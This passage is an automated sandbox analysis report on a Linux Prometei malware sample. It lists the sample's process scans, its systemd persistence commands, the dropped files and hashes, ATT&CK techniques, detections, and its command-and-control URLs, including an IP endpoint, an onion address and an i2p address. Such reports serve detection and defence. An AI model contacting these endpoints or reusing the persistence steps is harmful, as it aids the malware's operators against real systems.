Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/234/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/234/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1335/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1335/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1698/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/114/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/114/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/235/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/235/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1334/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1576/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/2302/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/115/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/115/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/236/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/236/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/116/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/116/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/237/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/237/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/117/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/117/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/118/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/118/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/910/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/910/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/119/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/119/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/912/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/912/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/10/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/10/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/2307/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/2307/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/11/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/11/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/918/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/918/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/12/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/12/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/13/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/13/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/14/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/14/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/15/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/15/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/16/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/16/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/17/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/17/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/18/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/18/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1594/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1594/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/120/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/120/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/121/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/121/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1349/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1349/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/1/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/122/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/122/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/243/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/243/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/123/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/123/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/2/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/2/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/124/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/124/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/3/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/3/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/4/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/4/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/125/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 6221)	File opened: /proc/125/cmdline	Jump to behavior

Source: /tmp/na.elf (PID: 6220)	Shell command executed: sh -c "pgrep na.elf"	Jump to behavior
Source: /tmp/na.elf (PID: 6224)	Shell command executed: sh -c "pgrep uplugplay"	Jump to behavior
Source: /tmp/na.elf (PID: 6230)	Shell command executed: sh -c "pidof uplugplay"	Jump to behavior
Source: /tmp/na.elf (PID: 6234)	Shell command executed: sh -c "pgrep upnpsetup"	Jump to behavior
Source: /tmp/na.elf (PID: 6238)	Shell command executed: sh -c "pidof upnpsetup"	Jump to behavior
Source: /tmp/na.elf (PID: 6242)	Shell command executed: sh -c "systemctl daemon-reload"	Jump to behavior
Source: /tmp/na.elf (PID: 6256)	Shell command executed: sh -c "systemctl enable uplugplay.service"	Jump to behavior
Source: /tmp/na.elf (PID: 6262)	Shell command executed: sh -c "systemctl start uplugplay.service"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6268)	Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6273)	Shell command executed: sh -c hostnamectl	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6413)	Shell command executed: sh -c uptime	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6417)	Shell command executed: sh -c "uname -a"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6438)	Shell command executed: sh -c hostnamectl	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6445)	Shell command executed: sh -c uptime	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6449)	Shell command executed: sh -c "uname -a"	Jump to behavior

Source: /bin/sh (PID: 6221)	Pgrep executable: /usr/bin/pgrep -> pgrep na.elf	Jump to behavior
Source: /bin/sh (PID: 6225)	Pgrep executable: /usr/bin/pgrep -> pgrep uplugplay	Jump to behavior
Source: /bin/sh (PID: 6235)	Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetup	Jump to behavior

Source: /bin/sh (PID: 6243)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/sh (PID: 6257)	Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.service	Jump to behavior
Source: /bin/sh (PID: 6263)	Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.service	Jump to behavior

Source: /usr/sbin/uplugplay (PID: 6269)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6269)	Reads from proc file: /proc/stat	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6269)	Reads from proc file: /proc/meminfo	Jump to behavior

Source: /tmp/na.elf (PID: 6217)

File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)

Jump to behavior

Source: /tmp/na.elf (PID: 6217)

File written: /usr/sbin/uplugplay

Jump to dropped file

Source: submitted sample

Stderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/na.elf (PID: 6217)

File: /usr/sbin/uplugplay

Jump to dropped file

Sample deletes itself

Source: /tmp/na.elf (PID: 6217)

File: /tmp/na.elf

Jump to behavior

Source: na.elf	Submission file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: na.elf	Submission file: segment LOAD with 7.943 entropy (max. 8.0)
Source: uplugplay.12.dr	Dropped file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: uplugplay.12.dr	Dropped file: segment LOAD with 7.943 entropy (max. 8.0)

Source: /usr/sbin/uplugplay (PID: 6269)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /usr/bin/pgrep (PID: 6221)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6225)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 6235)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6269)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 6414)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 6446)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Source: /tmp/na.elf (PID: 6217)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6264)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 6269)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 6418)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 6450)	Queries kernel information via 'uname':	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6276)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 6425)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 6427)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 6429)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 6431)	Queries kernel information via 'uname':	Jump to behavior

Source: /bin/sh (PID: 6418)	Uname executable: /usr/bin/uname -> uname -a			Jump to behavior
Source: /bin/sh (PID: 6450)	Uname executable: /usr/bin/uname -> uname -a			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	Boot or Logon Initialization Scripts	1 File and Directory Permissions Modification	LSASS Memory	4 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
na.elf	47%	ReversingLabs	Linux.Trojan.Generic
na.elf	100%	Avira	LINUX/GM.Agent.JQ

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/sbin/uplugplay	100%	Avira	LINUX/GM.Agent.JQ
/usr/sbin/uplugplay	47%	ReversingLabs	Linux.Trojan.Generic

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://152.36.128.18/cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://152.36.128.18/cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni	na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://upx.sf.net	na.elf, uplugplay.12.dr	false	high
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi	na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi	na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://152.36.128.18/cgi-bin/p.cgi	na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://dummy.zero/cgi-bin/prometei.cgi	na.elf, 6217.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://152.36.128	na.elf, uplugplay.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
199.232.90.49	unknown	United States	54113	FASTLYUS	false
152.36.128.18	unknown	United States	81	NCRENUS	true
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.232.90.49	na.elf	Get hash	malicious	Prometei	Browse
	miori.arm7.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	miori.arm5.elf	Get hash	malicious	Unknown	Browse
	Mozi.a.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
152.36.128.18	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=31&i=8LCN4KQ5FG8UGTSN
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=7&i=02ZQF59YO97QSN16
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=18&i=3590ZZ6L7CIM03B1
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=13&i=080ZX3RN6S3YO8YV
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=24&i=ITO34I304D6614V4
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=13&i=U040325A779G7J6U
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=8&i=X2Q9G3G42P689U7H
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=13&i=893Y835P0515575G
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=16&i=2334FW1YD8W7E6O4
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=13&i=P0VG80M1S0X364V8
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	na.elf	Get hash	malicious	Prometei	Browse	185.125.190.26
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	boatnet.ppc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	boatnet.arm6.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
CANONICAL-ASGB	na.elf	Get hash	malicious	Prometei	Browse	185.125.190.26
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	boatnet.ppc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	boatnet.arm6.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
INIT7CH	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	boatnet.ppc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	boatnet.arm6.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	fuckjewishpeople.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	Execution.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
FASTLYUS	na.elf	Get hash	malicious	Prometei	Browse	199.232.38.49
	na.elf	Get hash	malicious	Prometei	Browse	199.232.38.49
	na.elf	Get hash	malicious	Prometei	Browse	199.232.90.49
	https://get-razzed.online/krc	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://www.notion.so/loginwithemail?state%3Dv02%253Atemp_password%253AoMxvN1rDtJtCsgmtOezqMfwaMgP0Mi85Ztuq46xjKGwCLHja2k5SSVVFts0UZYrOcRv_CMCqmbA1CScbU-5b-N_gG0m3QbS2OxpSa0yi50-ycbev4dugfPfBEvCTxo9iBUYryzJkxnekptut2ZBzY7DzlNI3EVfOIHa9bfsc9hLlIG7HffWNvxq7rb6S4i3L_9RVB0XX-0_kCGUesHr7CDC0oRMVDAByZYgYcq-_NJYYCFuBxQ%26redirectUrl%3D%252F4a4146f9bfe14aef8476d79d45fc399e%26password%3D738380%26isSignup%3Dfalse%26isMicrosoft%3Dfalse	Get hash	malicious	Unknown	Browse	151.101.45.140
	fuckjewishpeople.m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	151.101.46.49
	fuckjewishpeople.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	151.101.46.49
	https://posit.co/download/rstudio-desktop/	Get hash	malicious	Unknown	Browse	23.185.0.4
	Execution.mpsl.elf	Get hash	malicious	Gafgyt, Mirai	Browse	199.232.38.49
	Execution.arm5.elf	Get hash	malicious	Gafgyt, Mirai	Browse	199.232.38.49
NCRENUS	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/CommId

Download File

Process:	/usr/sbin/uplugplay
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.75
Encrypted:	false
SSDEEP:	3:4T2NAl4n:b7
MD5:	5A2A79E1B0D8947EA387C6DE0D51431B
SHA1:	FE9336D4807CD0E9C465937AD918C7948ADD71BA
SHA-256:	89DD39E70D9EA66CA2B3AAFF6B04F3BDEA8B6E4F2E046E2C04470FC9D48C4488
SHA-512:	0884CF055C3AD2F6619CF9C687A2500D988D46017369CBDF336B0406B9F4B8A2E2E9F514C195F6A75BDDB700DC6CD2A5B6EEEAE59348760D05B57F529B000665
Malicious:	true
Reputation:	low
Preview:	213U6SANKFY6LBV1

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	high, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/usr/lib/systemd/system/uplugplay.service

Download File

Process:	/tmp/na.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.769509838572339
Encrypted:	false
SSDEEP:	3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
MD5:	8CA62D1F47880BCE036C2956C9B7B272
SHA1:	3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
SHA-256:	C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
SHA-512:	4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.

/usr/sbin/uplugplay

Download File

Process:	/tmp/na.elf
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	435932
Entropy (8bit):	7.942823038040744
Encrypted:	false
SSDEEP:	6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitgq:25WOSACZSV6eKRH5EPiamb4DsDwwca
MD5:	CB12D1DD62D556D8BAA0D115E6D41083
SHA1:	614A2974A372443717D9E765AE263FDF8025E1E8
SHA-256:	F91C066C91ADC1434C8182791A7E176EC7367BAA09F98084C4D3949EA48EE546
SHA-512:	9CE187157ACA9644AACD5942456BF7A939DAB26FE9B3145D818AC9CD455DA95BAE411948F8A056ADCF888DDE986383C928F71E7854F2EE6B2E1F2A70D4CE4A2E
Malicious:	true
Yara Hits:	Rule: Linux_Trojan_Dofloo_ac3333d1, Description: unknown, Source: /usr/sbin/uplugplay, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Reputation:	low
Preview:	.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v..p............. ..ELF......>....@.......0..'8..........W.3c..-.......o..K>...@!v..{_bo./.O7.%....o.....l..-.R..XOH....6..o..p..@... ....om.r2...D_..n.D...O...M(.S.td...POQn..PpnG.oRO!..=.0...%I.$...@.P.............y......GNU....'..l......?D....N...k.n..m"c...i......._....R.%..y...#N./ $../..p.E....v!#...._..r....K....../0.\|.....p.L.........H...._...#/v..._P.C2.b.`....y!.K...x!...@p.2.".oh...`......X.B.C;P_.L/H....@...N..8?.0O.C;.`(...q.\. ..O.$ar .@%I.!v...}...I&.n.......H...H...H..t..."...9.....?..%.....D................................}....ume....]U....ME=....5-%...................&..E.t$..T$.<{....%.....H.\|$...~.9.g...Sd2.OH.. ......kn(...$. 1.H9..+..t>d....4..u......~2..w..H.. mU.H.=d...o...V..`...V..=[._w.Ru6..O

/var/lib/fwupd/gnupg/.#lk0x000055e78355eb80.galassia.6427

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.108694969562842
Encrypted:	false
SSDEEP:	3:N/fc+vn:K+vn
MD5:	5CF38D5E4C897CA6C7FE692F27C6769E
SHA1:	9BCAB01248ABBCCD977A7BF9911D99E86D3E84EE
SHA-256:	E1BC277B42692AD201689ECC594CB5782D6337943814791683528301755AA16A
SHA-512:	5AFAFAB526DC98A424F4EB4570AAC1B925B639D3245292C9FFB54806D786329CC29B2E01AAE610B0B6AAD6EE71C3BC90F762B0098672851136ED12CA263C6E91
Malicious:	false
Reputation:	low
Preview:	6427.galassia.

/var/lib/fwupd/gnupg/.#lk0x000055e85c3a9b80.galassia.6425

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.108694969562842
Encrypted:	false
SSDEEP:	3:N/f6CB/vn:sCB/vn
MD5:	691316074EC7ACCB4246CC70E826A885
SHA1:	162CAE2F4AC9A7573338CDC67418FF3A7FA2AB1D
SHA-256:	8CE72685AA77EC4B35AD6A7A19E08A78C0FBB60DA5C4DC09390B9439439EB073
SHA-512:	56E4E09A4FF8372CB64DDB91289D3AF78793FFDD159C394BB52638E94DF8EEBD601225150C2B31865A75E4034A0C4CD2675313144EAE03545FCAF00E76BC77C9
Malicious:	false
Reputation:	low
Preview:	6425.galassia.

/var/lib/fwupd/gnupg/.#lk0x000055f30dfd7b80.galassia.6431

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.108694969562842
Encrypted:	false
